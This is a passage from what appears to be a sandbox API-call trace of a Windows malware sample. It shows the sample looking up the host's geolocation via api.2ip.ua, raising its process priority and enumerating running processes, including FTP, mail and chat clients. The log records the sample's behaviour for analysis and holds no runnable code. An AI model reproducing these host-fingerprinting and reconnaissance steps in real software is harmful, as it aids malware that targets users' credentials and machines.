dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0103.593] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x40) returned 0x6c5eb8 [0103.593] InternetOpenUrlW (hInternet=0xcc0004, lpszUrl="https://api.2ip.ua/geo.json", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0104.629] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x18ba58, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x18e258 | out: lpBuffer=0x18ba58*, lpdwNumberOfBytesRead=0x18e258*=0x22a) returned 1 [0104.629] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0104.629] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0104.629] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x20) returned 0x6dc528 [0104.636] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x240) returned 0x3277c50 [0104.642] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x3277c50 | out: hHeap=0x6b0000) returned 1 [0104.642] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6dc528 | out: hHeap=0x6b0000) returned 1 [0104.642] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6c5eb8 | out: hHeap=0x6b0000) returned 1 [0104.642] GetCurrentProcess () returned 0xffffffff [0104.642] GetLastError () returned 0x0 [0104.642] SetPriorityClass (hProcess=0xffffffff, dwPriorityClass=0x80) returned 1 [0104.648] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x10) returned 0x6fce08 [0104.648] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x8ec) returned 0x324ffc8 [0104.660] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x800) returned 0x323e500 [0104.660] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x323e500, nSize=0x400 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\3af89e63-1a12-46ae-ba57-0b2d2fa1411a\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\3af89e63-1a12-46ae-ba57-0b2d2fa1411a\\cusersgrujaappdatalocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe")) returned 0xd0 [0104.660] PathRemoveFileSpecW (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\3af89e63-1a12-46ae-ba57-0b2d2fa1411a\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\3af89e63-1a12-46ae-ba57-0b2d2fa1411a") returned 1 [0104.666] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x810) returned 0x701fb0 [0104.666] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\3af89e63-1a12-46ae-ba57-0b2d2fa1411a\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe\" --Task" [0104.666] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\3af89e63-1a12-46ae-ba57-0b2d2fa1411a\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe\" --Task", pNumArgs=0x18e338 | out: pNumArgs=0x18e338) returned 0x6dd5b8*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\3af89e63-1a12-46ae-ba57-0b2d2fa1411a\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe" [0104.666] lstrcpyW (in: lpString1=0x18efc8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\3af89e63-1a12-46ae-ba57-0b2d2fa1411a\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\3af89e63-1a12-46ae-ba57-0b2d2fa1411a\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\3af89e63-1a12-46ae-ba57-0b2d2fa1411a\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe" [0104.673] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\3af89e63-1a12-46ae-ba57-0b2d2fa1411a\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe\" --Task" [0104.673] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\3af89e63-1a12-46ae-ba57-0b2d2fa1411a\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe\" --Task", pNumArgs=0x18e2d4 | out: pNumArgs=0x18e2d4) returned 0x6dd5b8*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\3af89e63-1a12-46ae-ba57-0b2d2fa1411a\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe" [0104.673] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\3af89e63-1a12-46ae-ba57-0b2d2fa1411a\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe") returned="CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe" [0104.673] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0104.673] GetProcAddress (hModule=0x76d30000, lpProcName="EnumProcesses") returned 0x0 [0104.674] GetProcAddress (hModule=0x76d30000, lpProcName="EnumProcessModules") returned 0x0 [0104.674] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleBaseNameW") returned 0x0 [0104.674] LoadLibraryW (lpLibFileName="Psapi.dll") returned 0x77060000 [0104.704] GetProcAddress (hModule=0x77060000, lpProcName="EnumProcesses") returned 0x77061544 [0104.704] GetProcAddress (hModule=0x77060000, lpProcName="EnumProcessModules") returned 0x77061408 [0104.704] GetProcAddress (hModule=0x77060000, lpProcName="GetModuleBaseNameW") returned 0x7706152c [0104.704] EnumProcesses (in: lpidProcess=0x183ad0, cb=0xa000, lpcbNeeded=0x18e2e0 | out: lpidProcess=0x183ad0, lpcbNeeded=0x18e2e0) returned 1 [0104.707] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0104.707] CloseHandle (hObject=0x0) returned 0 [0104.707] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0104.707] CloseHandle (hObject=0x0) returned 0 [0104.707] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0104.708] CloseHandle (hObject=0x0) returned 0 [0104.708] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0104.708] CloseHandle (hObject=0x0) returned 0 [0104.708] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0104.708] CloseHandle (hObject=0x0) returned 0 [0104.708] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0104.708] CloseHandle (hObject=0x0) returned 0 [0104.708] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0104.708] CloseHandle (hObject=0x0) returned 0 [0104.708] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0104.708] CloseHandle (hObject=0x0) returned 0 [0104.708] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0104.708] CloseHandle (hObject=0x0) returned 0 [0104.708] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0104.708] CloseHandle (hObject=0x0) returned 0 [0104.708] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x250) returned 0x0 [0104.708] CloseHandle (hObject=0x0) returned 0 [0104.708] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0104.708] CloseHandle (hObject=0x0) returned 0 [0104.708] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x2c8) returned 0x0 [0104.708] CloseHandle (hObject=0x0) returned 0 [0104.708] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x338) returned 0x0 [0104.708] CloseHandle (hObject=0x0) returned 0 [0104.708] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x370) returned 0x0 [0104.709] CloseHandle (hObject=0x0) returned 0 [0104.709] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x3ac) returned 0x0 [0104.709] CloseHandle (hObject=0x0) returned 0 [0104.709] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xc8) returned 0x0 [0104.709] CloseHandle (hObject=0x0) returned 0 [0104.709] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x11c) returned 0x0 [0104.709] CloseHandle (hObject=0x0) returned 0 [0104.709] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x444) returned 0x5a4 [0104.709] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 0 [0104.709] CloseHandle (hObject=0x5a4) returned 1 [0104.709] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x454) returned 0x5a4 [0104.709] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 0 [0104.709] CloseHandle (hObject=0x5a4) returned 1 [0104.709] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x47c) returned 0x0 [0104.709] CloseHandle (hObject=0x0) returned 0 [0104.709] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4bc) returned 0x0 [0104.710] CloseHandle (hObject=0x0) returned 0 [0104.710] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4c8) returned 0x5a4 [0104.710] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 0 [0104.710] CloseHandle (hObject=0x5a4) returned 1 [0104.710] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x588) returned 0x0 [0104.710] CloseHandle (hObject=0x0) returned 0 [0104.710] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x90) returned 0x5a4 [0104.710] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0104.711] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x1310000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="jeep cant dl.exe") returned 0x10 [0104.711] CloseHandle (hObject=0x5a4) returned 1 [0104.711] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x340) returned 0x5a4 [0104.711] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0104.712] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x1030000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="particularly.exe") returned 0x10 [0104.712] CloseHandle (hObject=0x5a4) returned 1 [0104.712] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x76c) returned 0x5a4 [0104.712] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0104.713] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0xe40000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="forge_prospective.exe") returned 0x15 [0104.714] CloseHandle (hObject=0x5a4) returned 1 [0104.714] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x180) returned 0x5a4 [0104.714] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0104.715] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x1140000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="engagemanager.exe") returned 0x11 [0104.715] CloseHandle (hObject=0x5a4) returned 1 [0104.715] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x53c) returned 0x5a4 [0104.715] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0104.716] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x1280000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="falsepercent.exe") returned 0x10 [0104.716] CloseHandle (hObject=0x5a4) returned 1 [0104.716] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x60c) returned 0x5a4 [0104.716] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0104.717] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x1390000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="cool.exe") returned 0x8 [0104.717] CloseHandle (hObject=0x5a4) returned 1 [0104.717] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x20c) returned 0x5a4 [0104.718] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0104.718] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x320000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="carefully.exe") returned 0xd [0104.719] CloseHandle (hObject=0x5a4) returned 1 [0104.719] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x208) returned 0x5a4 [0104.719] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0104.720] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x8a0000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="forced_cooking.exe") returned 0x12 [0104.720] CloseHandle (hObject=0x5a4) returned 1 [0104.720] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7a0) returned 0x5a4 [0104.720] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0104.721] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x1100000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="takes-mix.exe") returned 0xd [0104.722] CloseHandle (hObject=0x5a4) returned 1 [0104.722] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x15c) returned 0x5a4 [0104.722] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0104.723] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0xd90000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="somewhere.exe") returned 0xd [0104.723] CloseHandle (hObject=0x5a4) returned 1 [0104.723] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x5d8) returned 0x5a4 [0104.723] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0104.724] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x320000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="retention.exe") returned 0xd [0104.724] CloseHandle (hObject=0x5a4) returned 1 [0104.724] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x414) returned 0x5a4 [0104.724] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0104.725] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x1380000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="villagesamefoo.exe") returned 0x12 [0104.725] CloseHandle (hObject=0x5a4) returned 1 [0104.725] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x798) returned 0x5a4 [0104.725] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0104.726] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x12e0000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="nonmedicines.exe") returned 0x10 [0104.727] CloseHandle (hObject=0x5a4) returned 1 [0104.727] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x600) returned 0x5a4 [0104.727] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0104.729] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x11b0000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="snow_attachment.exe") returned 0x13 [0104.729] CloseHandle (hObject=0x5a4) returned 1 [0104.729] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x540) returned 0x5a4 [0104.729] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0104.730] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x360000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="checkingmxlikewise.exe") returned 0x16 [0104.730] CloseHandle (hObject=0x5a4) returned 1 [0104.730] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x640) returned 0x5a4 [0104.730] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0104.731] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x2b0000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="ink.exe") returned 0x7 [0104.731] CloseHandle (hObject=0x5a4) returned 1 [0104.731] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7ac) returned 0x5a4 [0104.731] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0104.732] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0xc90000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="ear.exe") returned 0x7 [0104.733] CloseHandle (hObject=0x5a4) returned 1 [0104.733] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x644) returned 0x5a4 [0104.733] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0104.734] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x12c0000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="3dftp.exe") returned 0x9 [0104.734] CloseHandle (hObject=0x5a4) returned 1 [0104.734] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x304) returned 0x5a4 [0104.734] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0104.735] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0xc20000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="absolutetelnet.exe") returned 0x12 [0104.735] CloseHandle (hObject=0x5a4) returned 1 [0104.735] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7b4) returned 0x5a4 [0104.735] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0104.736] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0xd40000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="alftp.exe") returned 0x9 [0104.737] CloseHandle (hObject=0x5a4) returned 1 [0104.737] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x704) returned 0x5a4 [0104.737] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0104.738] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x90000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="barca.exe") returned 0x9 [0104.738] CloseHandle (hObject=0x5a4) returned 1 [0104.738] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x694) returned 0x5a4 [0104.738] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0104.739] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0xfc0000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="bitkinex.exe") returned 0xc [0104.739] CloseHandle (hObject=0x5a4) returned 1 [0104.739] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x620) returned 0x5a4 [0104.739] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0104.740] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0xab0000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="coreftp.exe") returned 0xb [0104.740] CloseHandle (hObject=0x5a4) returned 1 [0104.740] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xc0) returned 0x5a4 [0104.740] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0104.741] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0xbe0000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="far.exe") returned 0x7 [0104.742] CloseHandle (hObject=0x5a4) returned 1 [0104.742] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7a8) returned 0x5a4 [0104.742] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0104.743] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x9e0000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="filezilla.exe") returned 0xd [0104.743] CloseHandle (hObject=0x5a4) returned 1 [0104.743] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x360) returned 0x5a4 [0104.743] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0104.744] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x230000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="flashfxp.exe") returned 0xc [0104.744] CloseHandle (hObject=0x5a4) returned 1 [0104.744] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x240) returned 0x5a4 [0104.744] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0104.745] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0xf0000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="fling.exe") returned 0x9 [0104.745] CloseHandle (hObject=0x5a4) returned 1 [0104.746] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x790) returned 0x5a4 [0104.746] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0104.747] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0xf30000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="foxmailincmail.exe") returned 0x12 [0104.747] CloseHandle (hObject=0x5a4) returned 1 [0104.747] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x5d4) returned 0x5a4 [0104.747] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0104.748] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0xec0000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="gmailnotifierpro.exe") returned 0x14 [0104.748] CloseHandle (hObject=0x5a4) returned 1 [0104.748] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7e4) returned 0x5a4 [0104.748] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0104.749] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x320000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="icq.exe") returned 0x7 [0104.749] CloseHandle (hObject=0x5a4) returned 1 [0104.749] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x6c0) returned 0x5a4 [0104.749] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0104.750] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x1310000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="leechftp.exe") returned 0xc [0104.751] CloseHandle 